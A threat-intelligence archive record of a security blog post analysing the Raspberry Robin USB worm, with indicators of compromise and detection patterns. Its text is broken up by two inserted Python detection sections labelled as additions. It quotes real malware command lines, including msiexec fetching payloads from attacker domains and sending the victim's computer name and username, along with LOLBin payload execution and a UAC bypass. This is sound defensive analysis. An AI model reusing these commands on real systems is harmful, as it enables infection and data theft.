{
	"id": "44452f24-c08e-4550-b29f-4af09a144be0",
	"created_at": "2026-04-06T00:09:02.566611Z",
	"updated_at": "2026-04-10T03:21:59.951321Z",
	"deleted_at": null,
	"sha1_hash": "d8e21d7e7dd193ef6f98b2b17e240c489b522639",
	"title": "Raspberry Robin: Highly Evasive Worm Spreads over External Disks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 398192,
	"plain_text": "Raspberry Robin: Highly Evasive Worm Spreads over External Disks\r\nBy Onur Mustafa Erdogan\r\nPublished: 2022-08-09 · Archived: 2026-04-05 21:20:29 UTC\r\nIntroduction\r\nDuring our threat hunting exercises in recent months, we started to observe a distinctive pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The Red Canary research team first coined the name for this malware in their blog post [1], and Sekoia published a Flash Report about the activity under the name QNAP Worm [2]. Both articles offer a thorough analysis of the malware's behavior. Our findings support and enrich that prior research.\r\nExecution Chain\r\nRaspberry Robin is a worm that spreads over external drives. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel over TOR.\r\nImage 1: Execution chain of Raspberry Robin\r\nLet's walk through the steps of the kill chain to see how this malware functions.\r\nDelivery and Exploitation\r\nRaspberry Robin is delivered on infected external disks. Once a disk is attached, cmd.exe reads and executes commands from a file on that disk. This file is either a .lnk file or a file with a specific naming pattern: a 2 to 5 character name with an unusual extension such as .swy, .chk, .ico, .usb, .xml, or .cfg. The attacker also pads the command line with an excessive amount of whitespace and non-printable characters and varies the letter case to defeat string-matching detections. 
Example command lines include:\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /RCmD\u003cqjM.chK\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /rcMD\u003c[external disk name].LNk:qk\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /v /c CMd\u003cVsyWZ.ICO\r\nC:\\Windows\\System32\\cmd.exe [redacted whitespace/non printable characters] /R C:\\WINDOWS\\system32\\cmd.exe\u003cGne.Swy\r\nhttps://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\r\nPage 1 of 6\r\nA file sample for the delivery stage can be found at:\r\nhttps://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations\r\nNext, we observe explorer.exe running with an obscure command line argument, spawned by the earlier instance of cmd.exe. This argument appears to be the name of the infected external drive or of the .lnk file that was just executed. Some samples carried values such as USB, USB DISK, or USB Drive, while others had more specific names. In every instance of explorer.exe we see the adversary varying the letter case to avoid detection:\r\nExPLORer [redacted]\r\nexploREr [redacted]\r\nExplORER USB Drive\r\neXplorer USB DISK\r\nInstallation\r\nAfter delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q together with the standard install parameter (-i or /i) to run quietly. 
Once again, mixed-case letters are used to bypass detection:\r\nmSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]\r\nmSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]\r\nMSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]\r\nmSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]\r\nmsIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]\r\nMSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]\r\nAs the examples show, the URLs used for payload download follow a specific pattern. Domains use 2 to 4 character names under obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a random string 11 characters long, followed by the hostname and the username of the victim. In network telemetry we also observed the Windows Installer user agent, a consequence of the download being performed by msiexec.exe. To detect Raspberry Robin through its URL pattern, use this regex:\r\n^http[s]{0,1}\\:\\/\\/[a-zA-Z0-9]{2,4}\\.[a-zA-Z0-9]{2,6}\\:8080\\/[a-zA-Z0-9]+\\/.*?(?:-|\\=|\\?).*?$\r\nIf we look up the WHOIS information for the given domains, we see domain registration dates going as far back as February 2015. 
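The delivery and installation stages described above, turned into detection logic as an added example that is not part of the original post: it undoes the whitespace, non-printable and mixed-case tricks, then applies the cmd.exe redirect pattern, the explorer.exe parent/argument check and the report's URL regex (rewritten without backslash escapes) to a handful of constructed process-creation events. The event fields (pid, ppid, image, cmdline), the rule names and the sample command lines with their padding are assumptions made for the example.

```python
import re

# Constructed process-creation events, not telemetry from the original report.
# Paths are omitted, and the whitespace/non-printable padding the report redacts
# is rebuilt with chr() so the sample stays plain ASCII.
PAD = ' ' * 12 + chr(9) + chr(31) + ' ' * 6
SAMPLE_EVENTS = [
    {'pid': 1, 'ppid': 0, 'image': 'cmd.exe',      'cmdline': 'cmd.exe' + PAD + '/RCmD<qjM.chK'},
    {'pid': 2, 'ppid': 1, 'image': 'explorer.exe', 'cmdline': 'ExplORER USB Drive'},
    {'pid': 3, 'ppid': 1, 'image': 'msiexec.exe',  'cmdline': 'mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/AbCdEfGhIjK/DESKTOP-1=alice'},
    {'pid': 4, 'ppid': 1, 'image': 'cmd.exe',      'cmdline': 'cmd.exe' + PAD + '/rcMD<USB DISK.LNk:qk'},
    # Benign look-alikes: an installer fetched over HTTPS, Explorer opening a folder, a plain shell command.
    {'pid': 5, 'ppid': 9, 'image': 'msiexec.exe',  'cmdline': 'msiexec.exe /i https://download.example.com/setup.msi /qn'},
    {'pid': 6, 'ppid': 9, 'image': 'explorer.exe', 'cmdline': 'explorer.exe C:/Users/alice'},
    {'pid': 7, 'ppid': 1, 'image': 'cmd.exe',      'cmdline': 'cmd.exe /c dir'},
]

# The URL regex from the report, rewritten with character classes instead of
# backslash escapes (it accepts the same strings): 2-4 char host label, 2-6 char
# TLD, port 8080, one path directory, then a segment containing -, = or ?.
PAYLOAD_URL = re.compile(r'^https?://[a-zA-Z0-9]{2,4}[.][a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|[?]).*?$')

# cmd reading its input from a short file with one of the listed extensions, or
# from an alternate data stream of a .lnk file named after the disk.
USB_STAGER = re.compile(r'cmd(?:[.]exe)?<(?:[a-z0-9]{2,5}[.](?:swy|chk|ico|usb|xml|cfg)|[^<>]+?[.]lnk:[a-z0-9]+)')

def normalize(cmdline):
    # Undo the two evasions: drop non-printable padding, collapse whitespace runs
    # and lower-case everything before any pattern is applied.
    visible = ''.join(ch for ch in cmdline if ch.isprintable())
    return ' '.join(visible.split()).lower()

def is_mixed_case(token):
    # mSIexeC or ExplORER count; msiexec, MSIEXEC and Explorer do not.
    letters = [ch for ch in token if ch.isalpha()]
    if not letters:
        return False
    has_upper = any(ch.isupper() for ch in letters)
    has_lower = any(ch.islower() for ch in letters)
    capitalised = letters[0].isupper() and all(ch.islower() for ch in letters[1:])
    return has_upper and has_lower and not capitalised

def detect(events):
    # Returns (pid, rule) for every event that matches one of the three stages.
    by_pid = {e['pid']: e for e in events}
    hits = []
    for e in events:
        image = e['image'].lower()
        parent = by_pid.get(e['ppid'], {}).get('image', '').lower()
        norm = normalize(e['cmdline'])
        tokens = e['cmdline'].split()
        mixed = is_mixed_case(tokens[0]) if tokens else False
        if image == 'cmd.exe' and USB_STAGER.search(norm):
            hits.append((e['pid'], 'cmd_redirect_from_usb_file'))
        elif image == 'explorer.exe' and parent == 'cmd.exe' and (mixed or 'usb' in norm):
            hits.append((e['pid'], 'explorer_spawned_by_cmd_with_drive_name'))
        elif image == 'msiexec.exe':
            # Refang [.] and pull the URL out even when it is glued to -i / -I.
            url = re.search(r'https?://[^ ]+', norm.replace('[.]', '.'))
            if url and PAYLOAD_URL.match(url.group(0)):
                hits.append((e['pid'], 'msiexec_raspberry_robin_url'))
    return hits

if __name__ == '__main__':
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Normalising first and matching second is the point: the same rules applied to the raw command line would miss every padded or mixed-case sample, while the benign installer, folder open and shell command still produce no hit after normalisation. In production the ppid lookup would come from the EDR's process tree rather than a dictionary built from the batch.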
We also see an increase in registered domains starting from September 2021, which aligns with the initial observations of Raspberry Robin by our peers.\r\nWHOIS Creation Date Count\r\n12/9/2015 1\r\n… …\r\n10/8/2020 1\r\n11/14/2020 1\r\n7/3/2021 1\r\n7/26/2021 2\r\n9/11/2021 2\r\n9/23/2021 9\r\n9/24/2021 6\r\n9/26/2021 4\r\n9/27/2021 2\r\n11/9/2021 3\r\n11/10/2021 1\r\n11/18/2021 2\r\n11/21/2021 3\r\n12/11/2021 7\r\n12/31/2021 7\r\n1/17/2022 6\r\n1/30/2022 11\r\n1/31/2022 3\r\n4/17/2022 5\r\nTable 1: Distribution of domain creation dates over time\r\nThe associated domains serve TLS certificates with the subject alternative name q74243532.myqnapcloud.com, which points to the underlying QNAP cloud infrastructure. Their URL scan results also return the login page of the QNAP QTS service:\r\nImage 2: QNAP QTS login page from associated domains\r\nOnce the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to launch system binaries such as msiexec.exe, odbcconf.exe, or control.exe. These binaries are then used to execute the payload stored under C:\\ProgramData\\[3 chars]\\:\r\nC:\\WINDOWS\\system32\\rundll32.exe shell32.dll ShellExec_RunDLL\r\nC:\\WINDOWS\\syswow64\\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\\ProgramData\\Azu\\wnjdgz.vhbd. 
-passive /QR /PROMPTRESTART -QR -qb /forcerestart\r\nC:\\Windows\\system32\\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA\r\nC:\\Windows\\syswow64\\odbcconf.exe -s -C -a {regsvr C:\\ProgramData\\Tvb\\zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}\r\nexe SHELL32,ShellExec_RunDLLA C:\\WINDOWS\\syswow64\\odbcconf -E /c /C -a {regsvr C:\\ProgramData\\Euo\\ikdvnbb.xml.}\r\nC:\\WINDOWS\\system32\\rundll32.exe SHELL32,ShellExec_RunDLL\r\nC:\\WINDOWS\\syswow64\\CONTROL.EXE C:\\ProgramData\\Lzm\\qkuiht.lkg.\r\nThis is followed by the execution of fodhelper.exe, a binary whose manifest has autoElevate set to true. It is often leveraged by adversaries to bypass User Account Control and execute additional commands with elevated privileges [3]. To spot suspicious executions of fodhelper.exe, we suggest monitoring for instances launched without any command line arguments.\r\nCommand and Control\r\nRaspberry Robin sets up its C2 channel through further executions of system binaries without any command line arguments, which is quite unusual and likely points to process injection, made possible by the privileges gained in the previous steps. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.\r\nDetection through Global Threat Alerts\r\nIn Cisco Global Threat Alerts, available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:\r\nImage 3: Raspberry Robin detection sample in Cisco Global Threat Alerts\r\nConclusion\r\nRaspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. 
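The post-download execution chain and the C2 stage described above, as an added detection example that is not part of the original post: four rules cover rundll32.exe calling ShellExec_RunDLL, a LOLBin spawned by rundll32.exe with a payload path under C:\ProgramData, fodhelper.exe started with no arguments, and the bare dllhost/rundll32/regsvr32 instances the C2 stage relies on, plus a check that the stages fired in the reported order. The events, their parent images (including the assumption that msiexec.exe is the parent of the first rundll32.exe, which the report does not state), the rule names and the use of pid as a proxy for event order are all assumptions made for the example.

```python
import re

BS = chr(92)                      # a backslash, built with chr() so the sample holds no escape sequences
PD = 'C:' + BS + 'ProgramData' + BS

# Constructed process-creation events, not telemetry from the original report.
# The parent of the first rundll32.exe is an assumption; the report does not say
# what spawns it. The payload file names are the ones quoted in the report.
SAMPLE_CHAIN = [
    {'pid': 10, 'parent': 'msiexec.exe',   'image': 'rundll32.exe',  'cmdline': 'rundll32.exe shell32.dll ShellExec_RunDLL'},
    {'pid': 11, 'parent': 'rundll32.exe',  'image': 'msiexec.exe',   'cmdline': 'MSIEXEC.EXE /FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y ' + PD + 'Azu' + BS + 'wnjdgz.vhbd. -passive /QR'},
    {'pid': 12, 'parent': 'rundll32.exe',  'image': 'odbcconf.exe',  'cmdline': 'odbcconf.exe -s -C -a {regsvr ' + PD + 'Tvb' + BS + 'zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV}'},
    {'pid': 13, 'parent': 'rundll32.exe',  'image': 'control.exe',   'cmdline': 'CONTROL.EXE ' + PD + 'Lzm' + BS + 'qkuiht.lkg.'},
    {'pid': 14, 'parent': 'odbcconf.exe',  'image': 'fodhelper.exe', 'cmdline': 'fodhelper.exe'},
    {'pid': 15, 'parent': 'fodhelper.exe', 'image': 'dllhost.exe',   'cmdline': 'dllhost.exe'},
    # Benign look-alikes: a COM surrogate with its usual /Processid switch (made-up
    # GUID) and control.exe opening a Control Panel applet from Explorer.
    {'pid': 16, 'parent': 'svchost.exe',   'image': 'dllhost.exe',   'cmdline': 'dllhost.exe /Processid:{11111111-2222-3333-4444-555555555555}'},
    {'pid': 17, 'parent': 'explorer.exe',  'image': 'control.exe',   'cmdline': 'control.exe /name Microsoft.NetworkAndSharingCenter'},
]

# shell32.dll ShellExec_RunDLL or SHELL32,ShellExec_RunDLLA, any case.
SHELLEXEC = re.compile(r'shell32(?:[.]dll)?[ ,]+shellexec_rundlla?', re.IGNORECASE)
# Payload path C:/ProgramData/<3 chars>/<name>.<ext>. with the trailing dot that
# every sample quoted in the report carries (Win32 path normalisation strips it
# before the file is opened, so the file on disk has no trailing dot).
PAYLOAD_PATH = re.compile(r'c:/programdata/[a-z0-9]{3}/[a-z0-9]+[.][a-z0-9]+[.]', re.IGNORECASE)
LOLBINS = {'msiexec.exe', 'odbcconf.exe', 'control.exe'}
INJECTION_HOSTS = {'dllhost.exe', 'rundll32.exe', 'regsvr32.exe'}
STAGES = ('rundll32_shellexec_rundll', 'lolbin_runs_programdata_payload',
          'fodhelper_without_arguments', 'system_binary_without_arguments')

def detect_chain(events):
    # Returns (pid, rule) for each event that matches one of the four stages.
    hits = []
    for e in events:
        image, parent = e['image'].lower(), e['parent'].lower()
        cmd = e['cmdline'].replace(BS, '/')        # one separator, so the regex needs no escapes
        no_args = len(cmd.split()) == 1
        if image == 'rundll32.exe' and SHELLEXEC.search(cmd):
            hits.append((e['pid'], STAGES[0]))
        elif image in LOLBINS and parent == 'rundll32.exe' and PAYLOAD_PATH.search(cmd):
            hits.append((e['pid'], STAGES[1]))
        elif image == 'fodhelper.exe' and no_args:
            hits.append((e['pid'], STAGES[2]))
        elif image in INJECTION_HOSTS and no_args:
            hits.append((e['pid'], STAGES[3]))
    return hits

def full_chain(hits):
    # True when every stage fired and the first occurrence of each keeps the
    # reported order. pid stands in for event time here; real telemetry should
    # order by timestamp instead.
    first = {}
    for pid, rule in hits:
        first.setdefault(rule, pid)
    if not all(stage in first for stage in STAGES):
        return False
    order = [first[stage] for stage in STAGES]
    return order == sorted(order)

if __name__ == '__main__':
    found = detect_chain(SAMPLE_CHAIN)
    for pid, rule in found:
        print(pid, rule)
    print('full chain:', full_chain(found))
```

Each rule on its own has some benign noise (control.exe and dllhost.exe run constantly on a workstation), which is why the LOLBin rule insists on a rundll32.exe parent and a ProgramData path in the reported shape, and why full_chain only reports when the stages line up; the two benign look-alike events produce no hit at all.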
Like our peers, we still have intelligence gaps (how it infects external disks, and what its actions on objective are), but we are continuously observing its activities.\r\nIndicators of Compromise\r\nType Stage IOC\r\nDomain Payload Delivery k6j[.]pw\r\nDomain Payload Delivery kjaj[.]top\r\nDomain Payload Delivery v0[.]cx\r\nDomain Payload Delivery zk4[.]me\r\nDomain Payload Delivery zk5[.]co\r\nDomain Payload Delivery 0dz[.]me\r\nDomain Payload Delivery 0e[.]si\r\nDomain Payload Delivery 5qw[.]pw\r\nDomain Payload Delivery 6w[.]re\r\nDomain Payload Delivery 6xj[.]xyz\r\nDomain Payload Delivery aij[.]hk\r\nDomain Payload Delivery b9[.]pm\r\nDomain Payload Delivery glnj[.]nl\r\nDomain Payload Delivery j4r[.]xyz\r\nDomain Payload Delivery j68[.]info\r\nDomain Payload Delivery j8[.]si\r\nDomain Payload Delivery jjl[.]one\r\nDomain Payload Delivery jzm[.]pw\r\nDomain Payload Delivery k6c[.]org\r\nDomain Payload Delivery kj1[.]xyz\r\nDomain Payload Delivery kr4[.]xyz\r\nDomain Payload Delivery l9b[.]org\r\nDomain Payload Delivery lwip[.]re\r\nDomain Payload Delivery mzjc[.]is\r\nDomain Payload Delivery nt3[.]xyz\r\nDomain Payload Delivery qmpo[.]art\r\nDomain Payload Delivery tiua[.]uk\r\nDomain Payload Delivery vn6[.]co\r\nDomain Payload Delivery z7s[.]org\r\nDomain Payload Delivery k5x[.]xyz\r\nDomain Payload Delivery 6Y[.]rE\r\nDomain Payload Delivery doem[.]Re\r\nDomain Payload Delivery bpyo[.]IN\r\nDomain Payload Delivery l5k[.]xYZ\r\nDomain Payload Delivery uQW[.]fUTbOL\r\nDomain Payload Delivery t7[.]Nz\r\nDomain Payload Delivery 0t[.]yT\r\nReferences\r\n1. Raspberry Robin gets the worm early – https://redcanary.com/blog/raspberry-robin/\r\n2. QNAP worm: who benefits from crime? 
– https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf\r\n3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\r\nSource: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
	],
	"report_names": [
		"raspberry-robin-highly-evasive-worm-spreads-over-external-disks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434142,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.pdf",
		"text": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.txt",
		"img": "https://archive.orkl.eu/d8e21d7e7dd193ef6f98b2b17e240c489b522639.jpg"
	}
}